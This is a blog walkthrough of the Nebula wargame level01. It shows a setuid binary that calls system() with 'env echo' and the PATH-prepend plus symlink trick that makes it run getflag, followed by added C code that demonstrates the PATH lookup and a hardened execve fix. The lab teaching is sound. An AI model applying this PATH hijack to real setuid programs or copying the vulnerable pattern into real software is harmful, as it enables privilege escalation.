Depth of Code

Hani’s blog

exploit-exercises Nebula: level01

Oct 28, 2012

In level01 of Nebula wargame, we are required to find a vulnerability that allows us to run arbitrary programs. The source code of flag01 is provided:

#define _GNU_SOURCE   /* needed on glibc so setresuid()/setresgid() are declared */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;

    /* flag01 is setuid: copy the effective ids into the real and saved ids */
    gid = getegid();
    uid = geteuid();
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    /* "echo" has no path here: /usr/bin/env resolves it through the caller's PATH */
    system("/usr/bin/env echo and now what?");
}

The system() library call executes echo “and now what?”

level01@nebula:~$ ../flag01/flag01
and now what?

but instead of directly running /bin/echo, it uses /usr/bin/env to find the location of echo. Ever come across scripts starting with #!/usr/bin/env python? This is done for portability: hard-coding a path such as /usr/bin/python would not work when the Python interpreter is installed in a different location. How does env look for the specified program? It simply searches the directories listed in the PATH environment variable, starting with the first directory and going through them in order until it finds the requested program. The first match wins, so whoever controls the front of $PATH controls which echo gets run.

level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

How to attack this program? We prepend to $PATH a directory containing a symbolic link named echo that points to /bin/getflag.
First we prepend /home/level01 to $PATH:

level01@nebula:~$ export PATH=/home/level01/:$PATH

level01@nebula:~$ echo $PATH
/home/level01/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Now we create a symbolic link /home/level01/echo pointing to /bin/getflag:

level01@nebula:~$ ln -s /bin/getflag echo

level01@nebula:~$ ls -l echo
lrwxrwxrwx 1 level01 level01 12 2012-10-28 12:32 echo -> /bin/getflag

Now flag01 will run our own /home/level01/echo, which is simply a symbolic link to /bin/getflag:

level01@nebula:~$ ../flag01/flag01
You have successfully executed getflag on a target account
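To make the PATH lookup concrete and to show what the fix for flag01 looks like, here is an added example (my own code, not part of the Nebula sources or this write-up). resolve_in_path() replays the left-to-right search env performs, make_fake_echo_dir() constructs a writable directory with its own echo, like the /home/level01 entry above, and run_hardened_echo() is the setuid-safe form of the system() call: an absolute path, no shell, and a fixed environment, so the caller's $PATH is never consulted. It assumes a Linux system with /bin/echo present.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Mimic env's lookup: scan PATH left to right, return the first executable "cmd" (0 = found). */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t n)
{
    char *copy = strdup(path), *save = NULL;
    for (char *dir = strtok_r(copy, ":", &save); dir; dir = strtok_r(NULL, ":", &save)) {
        snprintf(out, n, "%s/%s", dir, cmd);
        if (access(out, X_OK) == 0) { free(copy); return 0; }
    }
    free(copy); out[0] = '\0';
    return -1;
}
/* Hardened replacement for flag01's system() call: absolute path, no shell, fixed
 * environment, so the caller's PATH is never consulted. Returns the child's exit status. */
int run_hardened_echo(void)
{
    char *const argv[] = { "/bin/echo", "and now what?", NULL };   /* assumes /bin/echo exists */
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    int status; pid_t pid = fork();
    if (pid == 0) { execve(argv[0], argv, envp); _exit(127); }
    if (pid < 0 || waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
/* Constructed for the demo: a writable directory holding an executable named "echo",
 * the kind of PATH entry the write-up prepends. Returns its path (malloc'd). */
char *make_fake_echo_dir(void)
{
    char tmpl[] = "/tmp/nebula01.XXXXXX", file[64];
    if (!mkdtemp(tmpl)) return NULL;
    snprintf(file, sizeof file, "%s/echo", tmpl);
    int fd = open(file, O_WRONLY | O_CREAT, 0755);
    if (fd < 0 || write(fd, "#!/bin/sh\n", 10) < 0) return NULL;
    close(fd);
    return strdup(tmpl);
}
int main(void)
{
    char *fake = make_fake_echo_dir(), path[256], found[256];
    snprintf(path, sizeof path, "%s:/usr/bin:/bin", fake ? fake : "");
    resolve_in_path("echo", path, found, sizeof found);
    printf("PATH=%s\n'env echo' would run: %s\n", path, found);
    return run_hardened_echo();   /* prints "and now what?" regardless of PATH */
}
```

With the constructed directory at the front of PATH, resolve_in_path() reports the fake echo, exactly as env would; the hardened launcher ignores PATH entirely, which is the property a setuid binary needs.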